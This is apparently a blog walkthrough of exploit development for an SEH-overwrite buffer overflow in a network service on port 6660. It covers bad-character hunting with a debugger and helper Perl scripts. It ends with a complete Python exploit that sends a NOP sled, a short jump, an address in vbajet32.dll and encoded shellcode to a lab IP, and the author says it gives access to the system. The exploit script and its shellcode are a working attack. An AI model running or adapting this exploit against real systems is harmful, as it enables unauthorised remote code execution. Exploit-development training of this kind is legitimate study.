- Bad Character
run the script generatecodes.pl
then copy the script into fuzzer per line.
after that, run it again and see in SEH chain. if success. SEH chain will be leads into file vbajet32.dll
then, copy the second line into script fuzzer like this
so we know the bad character found on second line. then try to divided into two parts.
\x12\x13\x14\x15\x16\x17\x18\x19\x1a and \x1b\x1c\x1d\x1e\x1f\x20
first, run the fuzzer without second part.
we can see in SEH chain that the SEH will leads into file vbajet32.dll. so we know that the bad character found on second parts. then divide it into two parts again, \x1b\x1c\x1d and \x1e\x1f\x20
and run it again without second part. and then the SEH will leads into file vbajet32.dll. so we know that the bad character found on \x1e, \x1f, and \x20. then try to run without \x20. so the SEH will leads into file vbajet32.dll again and we the bad character is \x20.
then use the generatecodes.pl again
then copy it into fuzzer and then run it again.
and we can see the SEH will leads into file vbajet32.dll.
- next step we have to check bad character inside the buffer
to find out it, run the fuzzer then press shift + F9
next process is read the buffer inside the memory.
right click --> Follow in Dump --> selection
then we can see the shellcode dummies has been entered into the memory.
the choose the data begin 01 until ff, then right click --> binary--> binary copy
and then paste it into editor. in here i will paste and save with name memory.txt
after that save the dummies shellcode into file shellcode.txt
then compare the two file (memory.txt and shellcode.txt) using comparememory.pl
then we can see that character \x25, \x26, \x27 on memory are lost and replace by character character \x57.
so try to remove character \x25 from list generate dummies shellcode.
root@bt:~# perl generatecodes.pl 00,0a,0d,20,25
then repeat the step form check bad character util compare (memory.txt and shellcode.txt).
if we success, compare will not show the result like previously
so from here we the bad character is character \x25 too. now we have 5 bad character ( \x00, \x0a, \x0d, \x20, and \x25)
next step, try to generate the shellcode again
then copy the payload into fuzzer and run it again.
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6
buffer+="\x6A\x19\x9A\x0F" # address of file vbajet.dll
buffer+="\x90" * 16
buffer+=("\xda\xc2\xb8\xf0\x80\x7a\x64\x29\xc9\xd9\x74\x24\xf4\xb1\x51\x5f"
"\x31\x47\x17\x83\xc7\x04\x03\xb7\x93\x98\x91\xcb\xfe\xb7\x17\xdb"
"\x06\xb8\x57\xe4\x99\xcc\xc4\x3e\x7e\x58\x51\x02\xf5\x22\x5f\x02"
"\x08\x34\xd4\xbd\x12\x41\xb4\x61\x22\xbe\x02\xea\x10\xcb\x94\x02"
"\x69\x0b\x0f\x76\x0e\x4b\x44\x81\xce\x86\xa8\x8c\x12\xfd\x47\xb5"
"\xc6\x26\x80\xbc\x03\xad\x8f\x1a\xcd\x59\x49\xe9\xc1\xd6\x1d\xb2"
"\xc5\xe9\xca\x4f\xda\x62\x85\x23\x06\x69\xf7\x78\x77\x4a\x93\xf5"
"\x3b\x5c\xd7\x49\xb0\x17\x97\x55\x65\xac\x18\x6d\x2b\xdb\x16\x23"
"\xdd\xf7\x77\x44\x37\x61\x2b\xdc\xd0\x5d\xf9\x48\x56\xd1\xcf\xd7"
"\xcc\xea\xe0\x8f\x27\xf9\xfd\x74\xe8\xfd\x28\xd5\x81\xe7\xb3\x68"
"\x7c\xef\x39\x3f\x15\xf2\xc2\x6f\x81\x2b\x35\x7a\xff\x9b\xb9\x52"
"\x53\x77\x15\x09\x07\x34\xca\xee\xf4\x45\x3c\x96\x92\xa8\xe1\x30"
"\x30\x42\xf8\x29\xde\xf0\xe1\x21\xd8\xae\xea\x17\x8c\x40\x44\xc2"
"\xae\xb1\x0e\x48\xfd\x1c\x26\xc7\x01\xb6\xeb\xb2\x02\xe7\x64\xd9"
"\xb4\x8e\x3c\x76\xb8\x59\xee\x2c\x12\x33\xf0\x1c\x09\xd3\xe9\xe5"
"\xe8\x5d\xa1\xea\x23\xc8\xb2\xc4\xaa\x99\x28\x82\x5a\x3d\xdc\xc3"
"\x7e\xab\x4e\x8a\xa9\xe0\xe6\xcb\xc0\xbc\x71\xf1\x24\xfd\x71\x5f"
"\xb8\xbf\x58\x61\x07\x6c\x30\x10\xf2\x54\x9d\x81\xa8\xcd\x93\x2b"
"\x1d\x1b\xab\xa6\x26\xdb\x85\x13\xf0\x71\x7b\xf2\xaf\x1f\x7a\xa5"
"\x1e\xb5\x2d\xba\x71\x5d\x63\x9d\x77\x50\x28\xe2\xae\x06\x30\xe3"
"\x78\x28\x1e\x90\xd0\x2a\x1c\x62\xba\x2d\xf5\x38\xbc\x02\x92\xc2"
"\x9a\x41\x10\x69\xe4\x50\x28\x5d")
buffer+="\x90" * (2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("kirim")
sock.close()
now we can access the system.
Alhamdulillah .... :D
No comments:
Post a Comment